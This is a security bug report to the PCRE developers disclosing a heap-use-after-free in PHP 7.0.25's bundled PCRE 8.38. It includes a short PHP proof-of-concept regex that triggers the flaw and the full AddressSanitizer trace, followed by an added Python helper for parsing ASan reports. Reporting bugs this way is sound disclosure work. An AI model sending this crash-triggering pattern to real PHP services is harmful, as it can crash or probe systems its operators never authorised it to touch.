[pcre-dev] [Bug 2184] New: heap-use-after-free in php7.0.25(…

Author: admin
Date:  
To: pcre-dev
Subject: [pcre-dev] [Bug 2184] New: heap-use-after-free in php7.0.25(bundled PCRE8.38)
https://bugs.exim.org/show_bug.cgi?id=2184

            Bug ID: 2184
           Summary: heap-use-after-free in php7.0.25(bundled PCRE8.38)
           Product: PCRE
           Version: 8.38
          Hardware: x86-64
                OS: Linux
            Status: NEW
          Severity: security
          Priority: medium
         Component: Code
          Assignee: ph10@???
          Reporter: idaifish@???
                CC: pcre-dev@???


Got the following ASAN report while fuzzing php7.0.25.

POC:
```php
<?php
$pattern = "/(((?(?C)0?=))(?!()0|.(?0)0)())/";
preg_match($pattern, "hello");
?>
```

```
$ php poc.php
```

```
==70724==ERROR: AddressSanitizer: heap-use-after-free on address 0x621000006500 at pc 0x00000073da38 bp 0x7fffe63d7010 sp 0x7fffe63d7008
READ of size 1 at 0x621000006500 thread T0
    #0 0x73da37 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:3248:23
    #1 0x703b62 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #2 0x7273ec in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #3 0x7273ec in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #4 0x6e1a37 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1804:9
    #5 0x703b62 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #6 0x7273ec in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #7 0x7273ec in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #8 0x6e1a37 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1804:9
    #9 0x703b62 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #10 0x7273ec in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #11 0x7273ec in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #12 0x6e1a37 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1804:9
    #13 0x703b62 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #14 0x7273ec in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #15 0x7273ec in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #16 0x6e1a37 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1804:9
    #17 0x703b62 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #18 0x7273ec in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #19 0x7273ec in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:981:9
    #20 0x6d0957 in php_pcre_exec /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:6934:8
    #21 0x8cba4e in php_pcre_match_impl /home/idai/PHPs/php-7.0.25/ext/pcre/php_pcre.c:808:11
    #22 0x8e6670 in php_do_pcre_match /home/idai/PHPs/php-7.0.25/ext/pcre/php_pcre.c:693:2
    #23 0x2156fd4 in ZEND_DO_ICALL_SPEC_HANDLER /home/idai/PHPs/php-7.0.25/Zend/zend_vm_execute.h:586:2
    #24 0x1f05c18 in execute_ex /home/idai/PHPs/php-7.0.25/Zend/zend_vm_execute.h:417:7
    #25 0x1f06de9 in zend_execute /home/idai/PHPs/php-7.0.25/Zend/zend_vm_execute.h:458:2
    #26 0x1cc2875 in zend_execute_scripts /home/idai/PHPs/php-7.0.25/Zend/zend.c:1445:4
    #27 0x19368c7 in php_execute_script /home/idai/PHPs/php-7.0.25/main/main.c:2518:14
    #28 0x2278e40 in do_cli /home/idai/PHPs/php-7.0.25/sapi/cli/php_cli.c:977:5
    #29 0x2275330 in main /home/idai/PHPs/php-7.0.25/sapi/cli/php_cli.c:1347:18
    #30 0x7f61132fd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #31 0x432128 in _start (/home/idai/Workspace/pcre/php_asan+0x432128)

0x621000006500 is located 0 bytes inside of 4096-byte region [0x621000006500,0x621000007500)
freed by thread T0 here:
    #0 0x4ea5f0 in __interceptor_cfree.localalias.0 (/home/idai/Workspace/pcre/php_asan+0x4ea5f0)
    #1 0x7f611335854a in _IO_setb (/lib/x86_64-linux-gnu/libc.so.6+0x7b54a)

previously allocated by thread T0 here:
    #0 0x4ea7a8 in malloc (/home/idai/Workspace/pcre/php_asan+0x4ea7a8)
    #1 0x7f611334a1d4 in _IO_file_doallocate (/lib/x86_64-linux-gnu/libc.so.6+0x6d1d4)

SUMMARY: AddressSanitizer: heap-use-after-free /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:3248:23 in match
Shadow bytes around the buggy address:
  0x0c427fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c427fff8ca0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c427fff8cb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c427fff8cc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c427fff8cd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c427fff8ce0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c427fff8cf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==70724==ABORTING
```
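An added triage helper, not part of this bug report, that parses an AddressSanitizer report of the shape shown above into its error kind, faulting access and the three stacks ASan prints, skipping ASan's own interceptor frames when locating the free and allocation sites; the embedded sample is a constructed, trimmed excerpt of this report.

```python
import re

# Constructed excerpt of the ASan report from the bug above, trimmed to a few frames.
SAMPLE_REPORT = """\
==70724==ERROR: AddressSanitizer: heap-use-after-free on address 0x621000006500 at pc 0x00000073da38
READ of size 1 at 0x621000006500 thread T0
    #0 0x73da37 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:3248:23
    #1 0x703b62 in match /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:1610:7
    #20 0x6d0957 in php_pcre_exec /home/idai/PHPs/php-7.0.25/ext/pcre/pcrelib/pcre_exec.c:6934:8
freed by thread T0 here:
    #0 0x4ea5f0 in __interceptor_cfree.localalias.0 (/home/idai/Workspace/pcre/php_asan+0x4ea5f0)
    #1 0x7f611335854a in _IO_setb (/lib/x86_64-linux-gnu/libc.so.6+0x7b54a)
previously allocated by thread T0 here:
    #0 0x4ea7a8 in malloc (/home/idai/Workspace/pcre/php_asan+0x4ea7a8)
    #1 0x7f611334a1d4 in _IO_file_doallocate (/lib/x86_64-linux-gnu/libc.so.6+0x6d1d4)
"""

ERROR_RE = re.compile(r"==\d+==ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+)", re.M)
FRAME_RE = re.compile(r"^\s+#(?P<n>\d+) 0x[0-9a-f]+ in (?P<func>\S+) (?P<loc>.+)$")

def parse_asan_report(text):
    """Summarise an ASan report: error kind, address, access op/size and its three stacks."""
    m = ERROR_RE.search(text)
    if not m:
        raise ValueError("not an AddressSanitizer error report")
    a = ACCESS_RE.search(text)
    summary = {"kind": m.group("kind"), "address": m.group("addr"),
               "access": (a.group("op"), int(a.group("size"))) if a else None}
    # ASan separates the stacks with labelled headers; frames before the first
    # header belong to the faulting access itself.
    stacks = {"access": [], "freed": [], "allocated": []}
    current = "access"
    for line in text.splitlines():
        if line.startswith("freed by"):
            current = "freed"
        elif line.startswith("previously allocated by"):
            current = "allocated"
        f = FRAME_RE.match(line)
        if f:
            stacks[current].append((f.group("func"), f.group("loc")))
    summary["stacks"] = stacks
    return summary

def first_non_interceptor_frame(frames):
    """Skip ASan interceptor frames (e.g. __interceptor_cfree) to reach the real caller."""
    for func, loc in frames:
        if not func.startswith("__interceptor_"):
            return func, loc
    return None
```

On this report the free and allocation stacks resolve to glibc stdio internals (_IO_setb and _IO_file_doallocate) rather than to anything in pcre_exec.c, which is the first thing to check when triaging whether the 4096-byte region is a PCRE-owned buffer at all.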

